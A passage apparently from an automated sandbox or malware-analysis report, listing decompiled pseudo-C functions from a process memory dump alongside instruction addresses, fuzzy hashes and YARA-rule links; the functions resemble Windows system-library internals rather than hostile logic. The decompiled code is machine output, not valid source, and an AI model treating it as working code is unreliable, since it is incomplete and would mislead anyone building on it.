Instruction Fuzzy Hash: 8A0180B2140605BFEB21AF66CC80E62BBBDFB54395F004529F11442660EB61BCA1CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 04659080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04659080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x47485ec;
				E04672280(_t48, 0x47485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0466FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x474538c; // 0x771c68c8
					if( *_t84 != 0x4745388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x472f6e8);
						E046AD0E8(0x47485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E047288F5(_t80, _t85, 0x4745388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x47486c0; // 0x28807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x47486b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04672280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E047288F5(0x47485ec, _t85, 0x4745388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0469AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x474b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x47484c0;
																			if(_t82 >=  *0x47484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04729063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0465922A(_t99);
										_t64 = E04677D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04728B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x47486c0; // 0x28807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x47486b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x47486bc;
													_t87 = 0x47486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04659240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x47486c4;
												_t87 = 0x47486c0;
												L27:
												E04689B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E046AD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4745388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x474538c = _t51;
						goto L6;
					}
				}
			}

0x04659082
0x04659083
0x04659084
0x04659085
0x04659087
0x04659096
0x04659098
0x04659098
0x0465909e
0x046590a8
0x046590e7
0x046590e7
0x046590aa
0x046590b0
0x046590b7
0x046590bd
0x046590dd
0x046590e6
0x046590bf
0x046590bf
0x046590c7
0x046590cf
0x046590f1
0x046590f2
0x046590f4
0x046590f5
0x046590f6
0x046590f7
0x046590f8
0x046590f9
0x046590fa
0x046590fb
0x046590fc
0x046590fd
0x046590fe
0x046590ff
0x04659100
0x04659102
0x04659107
0x0465910c
0x04659110
0x04659113
0x04659115
0x04659136
0x0465913f
0x04659143
0x046b37e4
0x046b37e4
0x04659117
0x04659117
0x0465911d
0x00000000
0x0465911f
0x0465911f
0x04659125
0x00000000
0x04659127
0x0465912d
0x04659130
0x04659134
0x04659158
0x0465915d
0x04659161
0x04659168
0x046b3715
0x0465916e
0x0465916e
0x04659175
0x04659177
0x0465917e
0x0465917f
0x04659182
0x04659182
0x04659187
0x04659187
0x0465918a
0x0465918d
0x0465918f
0x04659192
0x04659195
0x04659198
0x04659198
0x04659198
0x0465919a
0x00000000
0x00000000
0x046b371f
0x046b3721
0x046b3727
0x046b372f
0x046b3733
0x046b3735
0x046b3738
0x046b373b
0x046b373d
0x046b3740
0x00000000
0x046b3746
0x046b3746
0x046b3749
0x00000000
0x046b374f
0x046b374f
0x046b3751
0x046b3757
0x046b3759
0x046b375c
0x046b375c
0x046b375e
0x046b375e
0x046b3761
0x046b3764
0x00000000
0x00000000
0x046b3766
0x046b3768
0x046b37a3
0x046b37a3
0x046b37a5
0x046b37a7
0x046b37ad
0x046b37b0
0x046b37b2
0x046b37bc
0x046b37c2
0x046b37c2
0x046b37b2
0x04659187
0x04659187
0x0465918a
0x0465918d
0x0465918f
0x04659192
0x04659195
0x00000000
0x04659195
0x00000000
0x046b376a
0x046b376a
0x046b376a
0x046b376c
0x046b376c
0x046b376f
0x046b3775
0x00000000
0x00000000
0x046b3777
0x046b3779
0x046b3782
0x046b3787
0x046b3789
0x046b3790
0x046b3790
0x046b378b
0x046b378b
0x046b378b
0x046b3792
0x046b3795
0x00000000
0x046b3795
0x00000000
0x046b3779
0x046b3798
0x00000000
0x046b3798
0x00000000
0x046b3768
0x046b379b
0x046b379b
0x046b3751
0x046b3749
0x00000000
0x046b3740
0x046591a0
0x046591a3
0x046591a9
0x046591b0
0x00000000
0x046591b0
0x04659187
0x046591b4
0x046591b4
0x046591bb
0x046591c0
0x046591c5
0x046591c7
0x046b37da
0x046591cd
0x046591cd
0x046591cd
0x046591d2
0x046591d5
0x04659239
0x04659239
0x046591d7
0x046591db
0x046591e1
0x046591e7
0x046591fd
0x04659203
0x0465921e
0x04659223
0x00000000
0x04659205
0x04659205
0x04659208
0x0465920c
0x04659214
0x04659214
0x0465920c
0x046591e9
0x046591e9
0x046591ee
0x046591f3
0x046591f3
0x046591f3
0x046591e7
0x00000000
0x00000000
0x00000000
0x04659134
0x04659125
0x0465911d
0x0465914e
0x046590d1
0x046590d1
0x046590d3
0x046590d6
0x046590d8
0x00000000
0x046590d8
0x046590cf

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4737d04e825548fe79555aa9baa1f11f41e610c1cba2b053d937d66fb6341c
Instruction ID: a585e7551bfb99b1a557f14ce02d39925f2a2d4f9723ad3a613175b974d2b08f
Opcode Fuzzy Hash: 8a4737d04e825548fe79555aa9baa1f11f41e610c1cba2b053d937d66fb6341c
Instruction Fuzzy Hash: A601A4B2601604DFE3159F14D840B21B7F9EB85729F25446AEA059B7A1E374FC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04724015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04724015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04672280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04672280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x47486ac);
					E0465F900(0x47486d4, _t28);
					E0466FFB0(0x47486ac, _t28, 0x47486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0466FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0472401a
0x0472401e
0x04724023
0x04724028
0x04724029
0x0472402b
0x0472402f
0x04724043
0x04724046
0x04724051
0x04724057
0x0472405f
0x04724062
0x04724067
0x0472406f
0x0472407c
0x0472407c
0x0472408c
0x0472408c
0x04724097

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f36a44ee3b110d34d6b0fa3b0e6e83f7f8cf6f07fe4cc79c828ecba84c0d217
Instruction ID: c3cdd2377f6d9ae20e99e85d9d659f93b1889d8123f3cf304ba3d88090aae80f
Opcode Fuzzy Hash: 6f36a44ee3b110d34d6b0fa3b0e6e83f7f8cf6f07fe4cc79c828ecba84c0d217
Instruction Fuzzy Hash: 820184712019457FE255AB69CE80E13B7ACEB85658B00066DF50887A11EB74FC51CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 047114FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E047114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x474d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0469FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04677D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0469B640(E04699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x047114fb
0x047114fb
0x0471150a
0x04711514
0x04711519
0x0471151b
0x04711526
0x0471152c
0x04711534
0x04711537
0x0471153a
0x04711545
0x04711557
0x04711547
0x04711550
0x04711550
0x04711562
0x04711563
0x04711565
0x0471156a
0x0471157f

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967b1fac8be12e4d3b57218d4753e2074492eb228ec5d348ad2b4a9354acf4dc
Instruction ID: 38f497eccc810f403234df769c3ebd9edf0b8c7c0070f59cb40419844fe667a9
Opcode Fuzzy Hash: 967b1fac8be12e4d3b57218d4753e2074492eb228ec5d348ad2b4a9354acf4dc
Instruction Fuzzy Hash: B9015271A01258AFDB14DFA9D845EAEB7B8EF44714F40405AF915EB380E674EE40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0471138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0471138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x474d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0469FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04677D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0469B640(E04699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0471138a
0x0471138a
0x04711399
0x047113a3
0x047113a8
0x047113aa
0x047113b5
0x047113bb
0x047113c3
0x047113c6
0x047113c9
0x047113d4
0x047113e6
0x047113d6
0x047113df
0x047113df
0x047113f1
0x047113f2
0x047113f4
0x047113f9
0x0471140e

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974f5edab688eb76e6117a48273d6ad612c964a285568e917178bd738749d9cd
Instruction ID: 166f3f6645f65d31e38c44b4536f39f4b673901cf5e9e8af825f4f2530ed39af
Opcode Fuzzy Hash: 974f5edab688eb76e6117a48273d6ad612c964a285568e917178bd738749d9cd
Instruction Fuzzy Hash: 4B015271A01218AFDB14DFA9D841EAEB7B8EF44710F40405AB904EB380E674AE41C794

Uniqueness

Uniqueness Score: -1.00%

Function 04721074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04721074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0472165E(__ebx, 0x4748ae4, (__edx -  *0x4748b04 >> 0x14) + (__edx -  *0x4748b04 >> 0x14), __edi, __ecx, (__edx -  *0x4748b04 >> 0x14) + (__edx -  *0x4748b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0471AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04677D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0470FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04721074
0x04721080
0x04721082
0x0472108a
0x0472108f
0x04721093
0x047210ab
0x047210ab
0x047210c3
0x047210cf
0x047210e1
0x047210d1
0x047210da
0x047210da
0x047210e9
0x047210f5
0x047210f5
0x047210fe

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d4033813a53b2b9283d6f3a039190d5d044b02bdcca705a2c331c4be133d6a
Instruction ID: 8135a900ec91fd6da34c67c394c002832f9ff82334e209f00876aaf355482bc0
Opcode Fuzzy Hash: b6d4033813a53b2b9283d6f3a039190d5d044b02bdcca705a2c331c4be133d6a
Instruction Fuzzy Hash: 9601F5726047559BD720EB69C944B1A77D5FB84314F04C92AF88583391EE70F940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0466B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0466B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04677D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E046D7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0466b037
0x0466b039
0x0466b03b
0x0466b040
0x046ba60e
0x00000000
0x00000000
0x046ba61d
0x0466b04b
0x0466b04e
0x046ba627
0x046ba634
0x00000000
0x00000000
0x046ba641
0x046ba653
0x046ba643
0x046ba64c
0x046ba64c
0x046ba65b
0x00000000
0x00000000
0x00000000
0x046ba66c
0x0466b057
0x0466b057
0x0466b057
0x0466b046
0x0466b046
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: e685ff906f7a7dedb26482592632e38b4191cb045dde5e2d370428d52ea0c555
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 8A017172300584DFD326CB5CC984F667BD8EB55B54F0940A1E916CB751F628FC81C665

Uniqueness

Uniqueness Score: -1.00%

Function 0470FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0470FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x474d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0469FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04677D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0469B640(E04699AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0470fe3f
0x0470fe3f
0x0470fe4e
0x0470fe58
0x0470fe5d
0x0470fe5f
0x0470fe6a
0x0470fe72
0x0470fe75
0x0470fe78
0x0470fe83
0x0470fe95
0x0470fe85
0x0470fe8e
0x0470fe8e
0x0470fea0
0x0470fea1
0x0470fea3
0x0470fea8
0x0470febd

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e299c3b152c615e52dd6df1a4b0b8a61b7d710dd038176d21725ade54da68b29
Instruction ID: ff4f1bbe6ebb0118105fc35333276f054c06128052e347fb9946a9c833a319fb
Opcode Fuzzy Hash: e299c3b152c615e52dd6df1a4b0b8a61b7d710dd038176d21725ade54da68b29
Instruction Fuzzy Hash: BC017571A05208ABDB14DBA9D845EAEB7F8EF44704F00406AF9009B381EA74A901C798

Uniqueness

Uniqueness Score: -1.00%

Function 0470FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0470FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x474d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0469FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04677D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0469B640(E04699AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0470fec0
0x0470fec0
0x0470fecf
0x0470fed9
0x0470fede
0x0470fee0
0x0470feeb
0x0470fef3
0x0470fef6
0x0470fef9
0x0470ff04
0x0470ff16
0x0470ff06
0x0470ff0f
0x0470ff0f
0x0470ff21
0x0470ff22
0x0470ff24
0x0470ff29
0x0470ff3e

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8ee85f2c6185bd1d300ae0606f48fd2d9bea87ef095b01a227e1b366c8c9ec
Instruction ID: e16a4297b98c6bee6de7cfec37500a7e1ac0ef92bc1dc30e080df3a7579234be
Opcode Fuzzy Hash: 3e8ee85f2c6185bd1d300ae0606f48fd2d9bea87ef095b01a227e1b366c8c9ec
Instruction Fuzzy Hash: 68017171A01208ABDB14DBA9D845AAEB7B8EB44704F00406AF900EB380EA74BA01C798

Uniqueness

Uniqueness Score: -1.00%

Function 04728A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04728A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x474d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04677D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0469B640(E04699AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04728a62
0x04728a71
0x04728a79
0x04728a82
0x04728a85
0x04728a89
0x04728a8c
0x04728a8f
0x04728a92
0x04728a95
0x04728a9f
0x04728ab1
0x04728aa1
0x04728aaa
0x04728aaa
0x04728abc
0x04728abd
0x04728abf
0x04728ac4
0x04728ada

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e4a0bbedcd32c8fe21b2108b8fe24fb89ef5e87786b07575d36061783830d3
Instruction ID: d910f7a3e3734837d27bae60f4692f050aec529d543020df4d5a6268e4d48b74
Opcode Fuzzy Hash: 06e4a0bbedcd32c8fe21b2108b8fe24fb89ef5e87786b07575d36061783830d3
Instruction Fuzzy Hash: BF011AB1A00218AFDB10DFA9D9419AEB7B8EF48710F10405AF904E7341EA74AD008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 04728ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04728ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x474d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04677D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
